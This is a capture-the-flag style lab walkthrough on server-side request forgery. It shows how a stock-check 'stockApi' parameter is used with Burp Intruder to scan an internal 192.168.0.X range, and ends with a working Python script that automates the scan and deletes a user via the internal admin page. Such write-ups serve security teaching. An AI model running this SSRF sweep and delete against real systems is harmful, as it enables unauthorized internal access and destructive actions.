Introduction

This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.


Solution

1. Goal

Find the admin interface by using the stock check feature to scan the internal range http://192.168.0.X on port 8080, then use the same feature to delete the user carlos.

2. Find the request for check stock

Open a product detail page in the web UI and click the Check stock button. Find the resulting stock check request in Burp Suite under Proxy > HTTP history and send it to Intruder.

3. Construct Intruder Request

Now we can set up a Sniper attack in Intruder. We need to scan the internal 192.168.0.X range to find the IP address hosting the admin interface, so the request has to be sent 255 times, once for every possible last octet.

First, change the stockApi value to http://192.168.0.1:8080/admin (the admin interface is expected on port 8080 under /admin), mark only the last octet (the 1) as the payload position, and set the payload type to Numbers with a sequential range from 1 to 255 in steps of 1.

4. Start intruder attack

After that, click the Start attack button. Intruder now sends one request per address from 192.168.0.1 to 192.168.0.255. The attack window pops up and the progress can be tracked at the bottom of that window.

NOTE: doing this in Repeater would be time-consuming, because all 255 requests (http://192.168.0.1:8080/admin, http://192.168.0.2:8080/admin, and so on) would have to be edited by hand.

After Intruder finishes, sort the results by status code: payload 230 returns a success (HTTP 200) response while the other addresses do not, so the admin interface is at http://192.168.0.230:8080/admin.

5. Delete user carlos

Now read the response body of that request: the admin page it returns contains the URL for deleting the user carlos. Put that URL into the stockApi value and resend the request. It has to go through the stock check again because the internal host is not reachable from the browser directly. The response confirms that carlos has been deleted.
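The same sweep and follow-up delete, scripted in Python as an added example; this is not part of the original write-up and not PortSwigger's code. It assumes the stock check is a POST whose only form field is stockApi (the name used above), and LAB_URL is a placeholder for the lab instance. The sender is injected so the scan logic can be exercised against a constructed fake response set without a live lab; http_sender is the real one.

```python
import html.parser
import urllib.error
import urllib.parse
import urllib.request

# Assumed, not from the original write-up: the stock check is a POST whose only
# form field is stockApi, and LAB_URL is a placeholder for the lab instance.
LAB_URL = "https://example.invalid/product/stock"
INTERNAL_PREFIX = "192.168.0."
ADMIN_PORT = 8080
ADMIN_PATH = "/admin"


def candidate_urls(prefix=INTERNAL_PREFIX, port=ADMIN_PORT, path=ADMIN_PATH,
                   first=1, last=255):
    """The 255 targets Intruder builds from a Numbers payload 1..255 on the last octet."""
    return [f"http://{prefix}{octet}:{port}{path}" for octet in range(first, last + 1)]


def stock_check_body(target_url):
    """URL-encode the SSRF target into the stockApi form field, as the browser does."""
    return urllib.parse.urlencode({"stockApi": target_url}).encode()


def http_sender(lab_url=LAB_URL, timeout=5):
    """Build a sender that POSTs stockApi=<target> to the lab and returns (status, body).
    Network failures become status 0 so one dead host does not abort the sweep."""
    def send(target_url):
        req = urllib.request.Request(
            lab_url, data=stock_check_body(target_url), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:      # 4xx/5xx still carry a body
            return err.code, err.read()
        except urllib.error.URLError:
            return 0, b""
    return send


def scan_internal_range(send, urls=None):
    """Replay the Intruder sweep: one stock check per candidate, keep the HTTP 200 hits.
    The sender is injected so the sweep can run against a fake when there is no lab."""
    hits = []
    for url in (urls if urls is not None else candidate_urls()):
        status, body = send(url)
        if status == 200:
            hits.append((url, body))
    return hits


class _LinkCollector(html.parser.HTMLParser):
    """Collect every href from the admin page that came back through the SSRF."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def find_delete_link(admin_page_html, admin_url, username="carlos"):
    """Return the absolute delete URL for `username`, resolved against the admin URL
    so a relative href still points at the internal host, or None if absent."""
    collector = _LinkCollector()
    collector.feed(admin_page_html)
    for href in collector.hrefs:
        if "delete" in href.lower() and username in href:
            return urllib.parse.urljoin(admin_url, href)
    return None


def delete_user(send, admin_url, admin_page_html, username="carlos"):
    """Step 5: push the delete link back through the same stockApi parameter,
    since the internal host cannot be reached from the browser directly."""
    link = find_delete_link(admin_page_html, admin_url, username)
    if link is None:
        return None, None
    status, _ = send(link)
    return link, status


if __name__ == "__main__":
    send = http_sender()
    for admin_url, body in scan_internal_range(send):
        print("admin interface at", admin_url)
        print("delete:", delete_user(send, admin_url, body.decode(errors="replace")))
```

Resolving the delete link with urljoin matters: a relative href taken from the admin page would otherwise be sent to the lab's own host instead of back through the SSRF to 192.168.0.X.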


Thanks for reading